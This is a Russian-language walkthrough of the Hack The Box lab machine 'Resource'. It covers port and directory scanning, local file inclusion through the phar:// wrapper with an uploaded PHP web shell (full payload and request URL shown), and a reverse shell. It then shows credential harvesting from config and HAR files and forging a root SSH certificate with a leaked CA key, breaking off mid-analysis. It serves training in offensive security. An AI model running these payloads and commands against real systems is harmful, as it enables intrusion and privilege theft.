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Наша цель — получение прав суперпользователя на машине Resource с учебной площадки Hack The Box. Уровень ее сложности — «средняя».
Разведка
Сканирование портов
Добавляем IP-адрес машины в
/:
10.10.11.27 resource.htb
И запускаем сканирование портов.
Справка: сканирование портов
Сканирование портов — стандартный первый шаг при любой атаке. Он позволяет атакующему узнать, какие службы на хосте принимают соединение. На основе этой информации выбирается следующий шаг к получению точки входа.
Наиболее известный инструмент для сканирования — это Nmap. Улучшить результаты его работы ты можешь при помощи следующего скрипта:
#!/bin/bashports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)nmap -p$ports -A $1
Он действует в два этапа. На первом производится обычное быстрое сканирование, на втором — более тщательное сканирование, с использованием имеющихся скриптов (опция
-A).
Сканер нашел три открытых порта:
- 22 — служба OpenSSH 9.2p1;
- 80 — веб‑сервер Nginx 1.18.0;
- 2222 — служба OpenSSH 8.9p1.
На порте 80 выполняется редирект на адрес
http://, поэтому обновим запись в файле
/, а затем просмотрим сайт через браузер.
10.10.11.27 resource.htb itrc.ssg.htb
Точка входа
На сайте есть возможность регистрации и авторизации. Сделаем это, так как авторизованному пользователю обычно доступно больше функций, а значит и точек для атаки будет больше.
На странице
dashboard есть возможность заводить тикеты и загружать ZIP-архивы. Так как на сайте индекс файл представлен в формате PHP, попробуем найти другие PHP-файлы. Для этого будем использовать утилиту feroxbuster.
Справка: сканирование веба c feroxbuster
Одно из первых действий при тестировании безопасности веб‑приложения — это сканирование методом перебора каталогов с целью поиска скрытой информации и недоступной обычным посетителям функций. Для этого можно использовать программы вроде dirsearch, dirb или ffuf. Я предпочитаю feroxbuster.
При запуске используем следующие параметры:
-
-u— URL;
-
-w— словарь (я использую словари из набора Seclists);
-
-t— количество потоков;
-
-d— глубина сканирования.
Задаем все параметры и запускаем сканирование:
feroxbuster -u http://itrc.ssg.htb/ -w php_files_common_5476.txt -x php -d 1 -t 128
Находим много новых интересных файлов. Что примечательно, среди них присутствует
dashboard., а мы получали доступ к странице через
index.. Видимо, к параметру
page автоматически добавляется расширение
php. Попробуем таким же образом просмотреть страницу
admin..
Получаем содержимое страницы и пробуем тем же способом просмотреть и другие. При обращении к
/ видим ошибку, раскрывающую путь к файлам на сервере.
Точка опоры
Перейдем к созданию тикета. Во вложении загрузим рандомный ZIP-архив.
Тикет появится в общем списке. По кнопке Open просмотрим его содержимое.
Нам доступен для скачивания загруженный тестовый архив. По ссылке видно, что он хранится в каталоге
uploads с измененным именем.
Это значит, что у нас есть возможность эксплуатировать LFI, но работает она только для файлов PHP, а также мы знаем куда сохраняются ZIP-архивы. Можем попробовать реализовать следующий сценарий: на сервер загрузим архив с шеллом на PHP, а затем обратимся через LFI к файлу внутри архива через путь
phar:/.
Заархивируем файл
shell., загрузим архив на сервер и получим путь к нему на сервере.
<?php system($_GET['cmd']); ?>
Осталось обратиться к шеллу и в качестве теста выполнить команду
id.
http://itrc.ssg.htb/?page=phar://uploads/450373bf3fff7e53023e6b2736add325cd51e3bb.zip/shell&cmd=id
Команда выполнена, а значит, у нас есть RCE. Запускаем листенер
pwncat-cs и выполняем реверс‑шелл.
Побег из Docker
Пользователь msainristil
На хосте развернуто веб‑приложение, и оно наверняка использует базу данных. В таких случаях в базе можно найти учетные данные для сайта, которые могут пригодиться для дальнейшего проникновения. Данные для подключения к самой базе обычно находятся в коде или настройках веб‑приложения.
В данном случае учетку для базы находим в файле
db..
Использовать этот пароль нигде не получилось, поэтому осмотримся на сервере. Помимо загруженных нами архивов в каталоге
uploads можно найти и вложения к тикетам других пользователей. Скачиваем их на свою машину для анализа.
Два архива содержат публичные ключи SSH, а в оставшемся находим файл HAR.
В файлах HAR фиксируются разные неполадки браузера, такие как неудачные входы и проблемы с отображением веб‑страниц. Сразу же ищем в файле встроки вроде
user,
pass,
token и тому подобные. И находим учетные данные, сохраненные в открытом виде.
С полученными учетными подключаемся по SSH от имени пользователя
msainristill.
Пользователь root
В домашнем каталоге пользователя root есть каталог
decommission_old_ca с ключами центра сертификации.
Закрытый ключ центра сертификации
ca-itrc используются для подписи сертификатов. Публичный ключ
ca-itrc. используется для проверки подписи сертификатов. Мы можем использовать закрытый ключ центра сертификации для создания и подписи SSH-сертификата для любого логина. С помощью созданного сертификата можно будет получить доступ по SSH от имени пользователя с указанным в сертификате логином.
Первым делом сгенерируем пару SSH ключей.
ssh-keygen -t rsa -b 2048 -f ralf
Теперь с помощью ключей центра сертификации на основе публичного SSH ключа
ralf. сделаем сертификат SSH для логина
root. Сразу можно проверить новый сертификат
ralf-cert..
ssh-keygen -s ca-itrc -I ca-itrc.pub -n root ralf.pub
ssh-keygen -Lf ralf-cert.pub
Со сгенерированным сертификатом SSH сертификат и закрытым ключом пользователя получаем доступ от имени
root.
ssh -o CertificateFile=ralf-cert.pub -i ralf root@localhost
Пользователь support
В домашнем каталоге пользователя
zzinter есть скрипт
sign_key_api..
Проанализируем его. Скрипт принимает в качестве параметров публичный ключ, имя пользователя и принципал, возможные значения которого можно увидеть в справке (help).
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